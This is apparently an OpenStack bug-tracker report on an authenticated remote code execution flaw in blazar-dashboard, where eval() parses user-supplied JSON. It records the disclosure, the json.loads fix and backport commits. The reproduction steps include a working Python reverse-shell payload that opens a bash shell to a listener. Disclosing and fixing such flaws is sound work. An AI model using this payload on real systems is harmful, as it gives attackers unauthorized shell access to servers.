Authenticated RCE in blazar-dashboard via python expression in POST parameters

Bug #1895688 reported by Lukas on 2020-09-15
262
This bug affects 2 people
Affects Status Importance Assigned to Milestone
Blazar
Critical
Pierre Riteau

Bug Description

#Description
Several endpoints in blazar-dashboard use the python `eval` function to parse raw user input which is expected to be in JSON format. This can be exploited by an authenticated user to gain arbitrary code execution on the Horizon host.

#Reproduction
- Log into Horizon (blazar_dashboard must be installed and enabled)
- Navigate to `Admin` -> `Reservation` -> `Hosts`
- Click `+ Create Hosts`
- Enter a python expression in the text area under `Extra Capabilities`
-- It is also possible to execute python code containing multiple statements by wrapping it into an `exec('<python code>')` call
-- The attached video shows how a reverse shell can be achieved using this payload: `exec('import pty;import socket,os;s=socket.socket(socket.AF_INET,socket.SOCK_STREAM);s.connect(("127.0.0.1",4444));os.dup2(s.fileno(),0);os.dup2(s.fileno(),1);os.dup2(s.fileno(),2);pty.spawn("/bin/bash")')`
- Click `Create Hosts`

#Suggested fix
1.) Use `json.loads` instead of `eval` to parse JSON data
Only the `extra_caps` parameter could be tested due to problems with the local testing setup. However, the attached patch replaces all 4 usages of `eval` within the blazar_dashboard project, as they seem likely to contain additional vulnerabilities.
Please note that this change will break some hopefully unused functionality, like:
- arithmetic expressions in property values
```
{
    "key": 1300 + 37
}
```
- pseudo JSON using single quotes instead of double quotes
```
{
    'key': 1337
}
```

Lukas (lukas-eu) wrote :

Replacing all instances of `eval` with json.parse

Lukas (lukas-eu) wrote :
Lukas (lukas-eu) wrote :

Typo in previous comment: Patch replaces all instances of `eval` with `json.loads`

Jeremy Stanley (fungi) wrote :

I agree this sounds like a problem. I'm not especially familiar with use of Blazar, but it sounds like these JSON payloads are expected to come from sources other than the operator of the Horizon host, in which case this definitely represents at least privilege escalation.

Pierre: in your opinion would it be possible to include the included patch or something like it in a Victoria release candidate (as in by early next week)? If not, we're probably better off delaying any advisory until after release week and then backporting it in a stable point release just after.

Jeremy Stanley (fungi) wrote :

Also I do strongly recommend adding bandit to the linters for your projects, as it explicitly identifies use of eval/exec in your source code (among other common risks).

Pierre Riteau (priteau) wrote :

@Jeremy: Out of the four uses of eval, one is parsing data coming from Nova and two others are input from an Horizon admin. Unfortunately, the last one is parsing user input in the Update Lease form using the field titled "Reservation values to update".

Pierre Riteau (priteau) wrote :

We should be able to merge this for Victoria.

Pierre Riteau (priteau) on 2020-10-02
information type: Private Security → Public Security
Changed in blazar:
status: New → Confirmed
importance: Undecided → Critical
assignee: nobody → Pierre Riteau (priteau)

Fix proposed to branch: master
Review: https://review.opendev.org/755810

Changed in blazar:
status: Confirmed → In Progress

Reviewed: https://review.opendev.org/755810
Committed: https://git.openstack.org/cgit/openstack/blazar-dashboard/commit/?id=33c58438abf8221291d264db26a061279d4f22c7
Submitter: Zuul
Branch: master

commit 33c58438abf8221291d264db26a061279d4f22c7
Author: Lukas Euler <email address hidden>
Date: Tue Sep 15 15:25:40 2020 +0200

    Use json.loads instead of eval for JSON parsing

    Also fixed error messages.

    Change-Id: I998d6929ad05d9b5bc4e07f27f3f9cbf2dd64c68
    Closes-Bug: #1895688

Changed in blazar:
status: In Progress → Fix Released

Reviewed: https://review.opendev.org/755812
Committed: https://git.openstack.org/cgit/openstack/blazar-dashboard/commit/?id=168b4ae052480912fa6fdd2c77e16cd871528303
Submitter: Zuul
Branch: stable/ussuri

commit 168b4ae052480912fa6fdd2c77e16cd871528303
Author: Lukas Euler <email address hidden>
Date: Tue Sep 15 15:25:40 2020 +0200

    Use json.loads instead of eval for JSON parsing

    Also fixed error messages.

    Change-Id: I998d6929ad05d9b5bc4e07f27f3f9cbf2dd64c68
    Closes-Bug: #1895688
    (cherry picked from commit 33c58438abf8221291d264db26a061279d4f22c7)

tags: added: in-stable-ussuri

Reviewed: https://review.opendev.org/755813
Committed: https://git.openstack.org/cgit/openstack/blazar-dashboard/commit/?id=63e9c5d25617467016eea1dff0a34803c86b0953
Submitter: Zuul
Branch: stable/train

commit 63e9c5d25617467016eea1dff0a34803c86b0953
Author: Lukas Euler <email address hidden>
Date: Tue Sep 15 15:25:40 2020 +0200

    Use json.loads instead of eval for JSON parsing

    Also fixed error messages.

    Change-Id: I998d6929ad05d9b5bc4e07f27f3f9cbf2dd64c68
    Closes-Bug: #1895688
    (cherry picked from commit 33c58438abf8221291d264db26a061279d4f22c7)

tags: added: in-stable-train
tags: added: in-stable-stein

Reviewed: https://review.opendev.org/755814
Committed: https://git.openstack.org/cgit/openstack/blazar-dashboard/commit/?id=ee10b2c5c195088ec14725b790c17289ad20ed63
Submitter: Zuul
Branch: stable/stein

commit ee10b2c5c195088ec14725b790c17289ad20ed63
Author: Lukas Euler <email address hidden>
Date: Tue Sep 15 15:25:40 2020 +0200

    Use json.loads instead of eval for JSON parsing

    Also fixed error messages.

    Change-Id: I998d6929ad05d9b5bc4e07f27f3f9cbf2dd64c68
    Closes-Bug: #1895688
    (cherry picked from commit 33c58438abf8221291d264db26a061279d4f22c7)

Reviewed: https://review.opendev.org/756064
Committed: https://git.openstack.org/cgit/openstack/blazar-dashboard/commit/?id=5c7608dfa24dc5a5a3f18af09d35e8ea8760aee5
Submitter: Zuul
Branch: stable/victoria

commit 5c7608dfa24dc5a5a3f18af09d35e8ea8760aee5
Author: Lukas Euler <email address hidden>
Date: Tue Sep 15 15:25:40 2020 +0200

    Use json.loads instead of eval for JSON parsing

    Also fixed error messages.

    Change-Id: I998d6929ad05d9b5bc4e07f27f3f9cbf2dd64c68
    Closes-Bug: #1895688
    (cherry picked from commit 33c58438abf8221291d264db26a061279d4f22c7)

tags: added: in-stable-victoria
To post a comment you must log in.
This report contains Public Security information  Edit
Everyone can see this security related information.

Other bug subscribers